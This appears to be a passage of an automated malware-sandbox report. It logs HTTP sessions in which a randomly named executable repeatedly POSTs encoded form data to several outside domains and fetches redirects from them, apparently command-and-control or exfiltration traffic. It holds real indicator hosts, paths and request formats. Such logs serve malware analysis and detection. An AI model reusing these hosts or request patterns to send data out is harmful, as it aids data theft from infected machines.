                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                            pragma: no-cache
                                                                                                            content-type: text/html
                                                                                                            content-length: 1251
                                                                                                            date: Mon, 07 Oct 2024 13:56:40 GMT
                                                                                                            server: LiteSpeed
                                                                                                            platform: hostinger
                                                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                            x-xss-protection: 1; mode=block
                                                                                                            x-content-type-options: nosniff
                                                                                                            vary: User-Agent
                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12
Oct 7, 2024 15:56:40.507442951 CEST | 431 | IN
                                                                                                            Data Ascii: px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by L


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.9 | 49997 | 46.17.172.49 | 80 | 6568 | C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 15:56:42.138916969 CEST | 713 | OUT | POST /lbpf/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 220
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.galaxyslot88rtp.lat
                                                                                                            Origin: http://www.galaxyslot88rtp.lat
                                                                                                            Referer: http://www.galaxyslot88rtp.lat/lbpf/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Ascii: EjLdUJJ=B8r/v0PfZmCZF51X+0FB2GHfau0bo7g6cnXkDEhEuQmFo94qtw/mbYsWWeCxw2RV8nOYMeGr9enySaxlVGS27vWCB8L5WVhfxXqQLeyRP4n/hg4CsHt8TjC5bgNY2zW4Nlxny0y3SkpTF4lvElqLHSEKHSEiZ1SU+gmoMQU5hEmFhHqIOkbwOFxSvwq0Ml3iiJJdP0SYTUBERj6uMg==
Oct 7, 2024 15:56:43.058789015 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                            Connection: close
                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                            pragma: no-cache
                                                                                                            content-type: text/html
                                                                                                            content-length: 1251
                                                                                                            date: Mon, 07 Oct 2024 13:56:42 GMT
                                                                                                            server: LiteSpeed
                                                                                                            platform: hostinger
                                                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                            x-xss-protection: 1; mode=block
                                                                                                            x-content-type-options: nosniff
                                                                                                            vary: User-Agent
                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12
Oct 7, 2024 15:56:43.058811903 CEST | 431 | IN
                                                                                                            Data Ascii: px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by L
Oct 7, 2024 15:56:44.105621099 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                            Connection: close
                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                            pragma: no-cache
                                                                                                            content-type: text/html
                                                                                                            content-length: 1251
                                                                                                            date: Mon, 07 Oct 2024 13:56:42 GMT
                                                                                                            server: LiteSpeed
                                                                                                            platform: hostinger
                                                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                            x-xss-protection: 1; mode=block
                                                                                                            x-content-type-options: nosniff
                                                                                                            vary: User-Agent
                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12
                                                                                                            Oct 7, 2024 15:56:44.106067896 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                            Connection: close
                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                            pragma: no-cache
                                                                                                            content-type: text/html
                                                                                                            content-length: 1251
                                                                                                            date: Mon, 07 Oct 2024 13:56:42 GMT
                                                                                                            server: LiteSpeed
                                                                                                            platform: hostinger
                                                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                            x-xss-protection: 1; mode=block
                                                                                                            x-content-type-options: nosniff
                                                                                                            vary: User-Agent
                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            23 | 192.168.2.9 | 49998 | 46.17.172.49 | 80 | 6568 | C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Oct 7, 2024 15:56:44.910368919 CEST | 1726 | OUT | POST /lbpf/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 1232
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.galaxyslot88rtp.lat
                                                                                                            Origin: http://www.galaxyslot88rtp.lat
                                                                                                            Referer: http://www.galaxyslot88rtp.lat/lbpf/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Ascii: EjLdUJJ= [TRUNCATED]
                                                                                                            Oct 7, 2024 15:56:45.770462036 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                            Connection: close
                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                            pragma: no-cache
                                                                                                            content-type: text/html
                                                                                                            content-length: 1251
                                                                                                            date: Mon, 07 Oct 2024 13:56:45 GMT
                                                                                                            server: LiteSpeed
                                                                                                            platform: hostinger
                                                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                            x-xss-protection: 1; mode=block
                                                                                                            x-content-type-options: nosniff
                                                                                                            vary: User-Agent
                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12
                                                                                                            Oct 7, 2024 15:56:45.771207094 CEST | 431 | IN
                                                                                                            Data Ascii: px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by L


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            24 | 192.168.2.9 | 49999 | 46.17.172.49 | 80 | 6568 | C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Oct 7, 2024 15:56:47.468005896 CEST | 419 | OUT | GET /lbpf/?EjLdUJJ=M+DfsBvEIkyOAb10y0dA+UDjYbUtqrwEKADScmdz2U7nr/YOsALJT64KSPaG4zh33A22H+qXr8/USoZXKjK9wtqtHM6pRVxdkXmhbbPLR4PLxBAP1w==&WLUDu=SXq8yrvPVd3tf HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Host: www.galaxyslot88rtp.lat
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Oct 7, 2024 15:56:48.385234118 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                            Connection: close
                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                            pragma: no-cache
                                                                                                            content-type: text/html
                                                                                                            content-length: 1251
                                                                                                            date: Mon, 07 Oct 2024 13:56:48 GMT
                                                                                                            server: LiteSpeed
                                                                                                            platform: hostinger
                                                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                            x-xss-protection: 1; mode=block
                                                                                                            x-content-type-options: nosniff
                                                                                                            vary: User-Agent
                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12
                                                                                                            Oct 7, 2024 15:56:48.385255098 CEST | 431 | IN
                                                                                                            Data Ascii: px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by L


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            25 | 192.168.2.9 | 50000 | 3.33.130.190 | 80 | 6568 | C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Oct 7, 2024 15:56:53.463088989 CEST | 689 | OUT | POST /kzas/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 196
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.warriorsyndrome.net
                                                                                                            Origin: http://www.warriorsyndrome.net
                                                                                                            Referer: http://www.warriorsyndrome.net/kzas/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Ascii: EjLdUJJ=mavQ0O47J2hH/T5loBWaYkoIWUPSt1jejDzv1Ibl3LO/OPh/vLWUyF2FJtTJ+Z6JuDWIkHNaTii+jOaxXRswHV0V2JiFu9IZLWEraIex+YXIqgU83Tf26MkXFtrfPZ4s0l5C+L0JxcQiKx8vGvgRG2GuaKKMV/Fzl0Ab0vt6zLquc8rpYwbo8ciBv0HL


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            26 | 192.168.2.9 | 50001 | 3.33.130.190 | 80 | 6568 | C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Oct 7, 2024 15:56:56.583277941 CEST | 713 | OUT | POST /kzas/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 220
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.warriorsyndrome.net
                                                                                                            Origin: http://www.warriorsyndrome.net
                                                                                                            Referer: http://www.warriorsyndrome.net/kzas/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Ascii: EjLdUJJ=mavQ0O47J2hHwTJlti+aeEoHTUPS3FjSjD/v1Jv13+m/OqN/oKWUzF2FCNSNjp6WuDaAkDFaTmK+jL2xXgszWV0T5piLhdIZLWEraIab+YPIrT884Sfx5MkUR9rfep4o0l4l+KonxYgiKz0vGc4efmGseKKdT9t8pmYlqMkeh4e8fdL3JCSzpLimoTOjRsPAxKDno3+CtWkqBc43Bg==


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            27 | 192.168.2.9 | 50002 | 3.33.130.190 | 80 | 6568 | C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Oct 7, 2024 15:56:59.156229019 CEST | 1726 | OUT | POST /kzas/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 1232
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.warriorsyndrome.net
                                                                                                            Origin: http://www.warriorsyndrome.net
                                                                                                            Referer: http://www.warriorsyndrome.net/kzas/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Ascii: EjLdUJJ= [TRUNCATED]


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            28 | 192.168.2.9 | 50003 | 3.33.130.190 | 80 | 6568 | C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Oct 7, 2024 15:57:01.698904037 CEST | 419 | OUT | GET /kzas/?EjLdUJJ=rYHw3+wcZ3MA1g8BlTjgV3gIUSr9tyXK9S6FoLDJmOPSIdlvtrqwrkb5B8iquLWNvXCfhDtVKXWhlby4MVAaJGgKmeWEiKc2IkdQLoOlpJ6MlzQWug==&WLUDu=SXq8yrvPVd3tf HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Host: www.warriorsyndrome.net
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Oct 7, 2024 15:57:02.142079115 CEST | 399 | IN | HTTP/1.1 200 OK
                                                                                                            Server: openresty
                                                                                                            Date: Mon, 07 Oct 2024 13:57:02 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 259
                                                                                                            Connection: close
                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?EjLdUJJ=rYHw3+wcZ3MA1g8BlTjgV3gIUSr9tyXK9S6FoLDJmOPSIdlvtrqwrkb5B8iquLWNvXCfhDtVKXWhlby4MVAaJGgKmeWEiKc2IkdQLoOlpJ6MlzQWug==&WLUDu=SXq8yrvPVd3tf"}</script></head></html>


                                                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                           29 | 192.168.2.9 | 50004 | 3.33.130.190 | 80 | 6568 | C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                                                           Oct 7, 2024 15:57:07.241625071 CEST | 662 | OUT | POST /uxh9/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 196
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.ks1x7i.vip
                                                                                                            Origin: http://www.ks1x7i.vip
                                                                                                            Referer: http://www.ks1x7i.vip/uxh9/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Ascii: EjLdUJJ=9uXoZFMaf5MxH1zAyLp6zfdGh7SG67lNvqHcHAgbuc+c639boxDEfCzd2kx35h7TPuQduXRqrDHDiaFtF8lhyBQy2nF/lbTQH0eoMWizewoM8Ck0zwhV6uUBOjo6hmLIeB371dd+RVlNHzy5gveMqFNasC4Vkczh8kxkhifQvR3Lp42IH1e59ksmD/5G


                                                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                           30 | 192.168.2.9 | 50005 | 3.33.130.190 | 80 | 6568 | C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                                                           Oct 7, 2024 15:57:09.798033953 CEST | 686 | OUT | POST /uxh9/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 220
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.ks1x7i.vip
                                                                                                            Origin: http://www.ks1x7i.vip
                                                                                                            Referer: http://www.ks1x7i.vip/uxh9/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Ascii: EjLdUJJ=9uXoZFMaf5MxFVjA+M961/dJk7SG0rlJvqLcHBVAtoSc6SBbp0jEKCzdu0xymx7YPuc7uTRqrDTDia1tFvd+wRQ06HF9o7TQH0eoMW3Ue2AM8y00zU1WzOUGJjo6lmLEeB2L1cxYRXdNHx65ueePhFNQxy4LjpvsyiRanyzV7xXin5WWWHXiozsBEYwuqc2fGoNnyscOc1tKoSb22w==


                                                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                           31 | 192.168.2.9 | 50006 | 3.33.130.190 | 80 | 6568 | C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                                                           Oct 7, 2024 15:57:12.343573093 CEST | 1699 | OUT | POST /uxh9/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 1232
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.ks1x7i.vip
                                                                                                            Origin: http://www.ks1x7i.vip
                                                                                                            Referer: http://www.ks1x7i.vip/uxh9/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)


                                                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                           32 | 192.168.2.9 | 50007 | 3.33.130.190 | 80 | 6568 | C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                                                           Oct 7, 2024 15:57:15.079993963 CEST | 410 | OUT | GET /uxh9/?WLUDu=SXq8yrvPVd3tf&EjLdUJJ=ws/IawdEHaoWNg/j/7Jh7udGjrT+7JNe46jOTwFB35qywQtlsi2lBgTXskhK1RztBb48nT9+3zT3nLR+G4pW1yQztlFWqraTHnGITGOJIT5K53AYpg== HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Host: www.ks1x7i.vip
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                           Oct 7, 2024 15:57:15.518826008 CEST | 399 | IN | HTTP/1.1 200 OK
                                                                                                            Server: openresty
                                                                                                            Date: Mon, 07 Oct 2024 13:57:15 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 259
                                                                                                            Connection: close
                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?WLUDu=SXq8yrvPVd3tf&EjLdUJJ=ws/IawdEHaoWNg/j/7Jh7udGjrT+7JNe46jOTwFB35qywQtlsi2lBgTXskhK1RztBb48nT9+3zT3nLR+G4pW1yQztlFWqraTHnGITGOJIT5K53AYpg=="}</script></head></html>


                                                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                           33 | 192.168.2.9 | 50008 | 84.32.84.32 | 80 | 6568 | C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                                                           Oct 7, 2024 15:57:20.851960897 CEST | 689 | OUT | POST /ml5l/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 196
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.pakmartcentral.shop
                                                                                                            Origin: http://www.pakmartcentral.shop
                                                                                                            Referer: http://www.pakmartcentral.shop/ml5l/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Ascii: EjLdUJJ=n1VlSVnjPhGVM7WGuDAxXc0alRND8fd5Di65xd/ZXxHg1k/FznbKuZLJDANmtuY7HM9qdUTt17H4MZWrc5n2jvtGalG3HJYgUkwiDNoFJj0FS233STKpHq2GxHk0hJKjAJbDHaBBrifwUazOUGPjrYNkDfV/4YIaHjbxB/oLTJmpchSp3Tz9xezTFf5L


                                                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                           34 | 192.168.2.9 | 50009 | 84.32.84.32 | 80 | 6568 | C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                                                           Oct 7, 2024 15:57:24.300533056 CEST | 713 | OUT | POST /ml5l/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 220
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.pakmartcentral.shop
                                                                                                            Origin: http://www.pakmartcentral.shop
                                                                                                            Referer: http://www.pakmartcentral.shop/ml5l/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Ascii: EjLdUJJ=n1VlSVnjPhGVNbmGtksxQ80ZpxND1/d1Dim5xYfJXjTg0BDF0mbKpZLJEwNviOYkHM5IdVDt1/v4MYmrcOz1j/tTP1G1E5YgUkwiDNVoJjsFSHn3dRiqBa2FhXk0lJKvAJbhHbdrrkbwUbDOVTjihYNmHfULzIFQHwXJK9UZCb3MfAy3mh6mkJz0C4wjq3g14N1U1xEljTHeskCQXA==


                                                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                           35 | 192.168.2.9 | 50010 | 84.32.84.32 | 80 | 6568 | C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                                                           Oct 7, 2024 15:57:26.892824888 CEST | 1726 | OUT | POST /ml5l/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 1232
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.pakmartcentral.shop
                                                                                                            Origin: http://www.pakmartcentral.shop
                                                                                                            Referer: http://www.pakmartcentral.shop/ml5l/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)


                                                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                           36 | 192.168.2.9 | 50011 | 84.32.84.32 | 80 | 6568 | C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                           Timestamp | Bytes transferred | Direction | Data
